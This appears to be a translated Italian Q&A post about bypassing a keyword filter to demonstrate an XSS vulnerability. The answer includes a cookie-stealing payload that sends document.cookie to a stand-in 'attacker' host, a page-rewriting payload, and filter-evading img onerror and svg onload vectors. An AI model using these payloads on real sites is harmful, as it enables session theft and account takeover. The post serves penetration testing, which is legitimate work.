Mi sono imbattuto in un campo che è vulnerabile a XSS. Accetta e contrassegna tuttavia le parole chiave script, alert, msgbox, prompt sono bloccati. Ho provato ogni versione codificata di queste parole chiave ma non funziona.
C'è un modo in cui posso mostrare un POC (popup XSS) senza usare le parole chiave sopra.
Ho iniettato un frame con successo e anche i cookie non sono solo HTTP.
Nessun utente malintenzionato userà mai alert() , il controllo per questo all'interno di una stringa di attacco è più di una perdita di tempo, dimostra che lo sviluppatore non capisce come viene attaccato il software.
Potresti mostrare un attacco del mondo reale, in cui leggi un token CSRF o il valore document.cookie :
document.write("<img src=http://attacker/cookie_theif?c="+document.cookie+" />")
Potresti anche riscrivere la pagina, questa potrebbe essere usata per trasformare la pagina in una pagina di fasi:
document.body.innerHTML="owned:"+document.cookie
<img src=x onerror=confirm(String.fromCharCode(88,83,83))>
Se il sito utilizza SVG come immagini, puoi utilizzare questo:
<svg onload=prompt(1)>
Nessuna <script> , alert , msgbox e o prompt parola necessaria.
Leggi altre domande sui tag web-application xss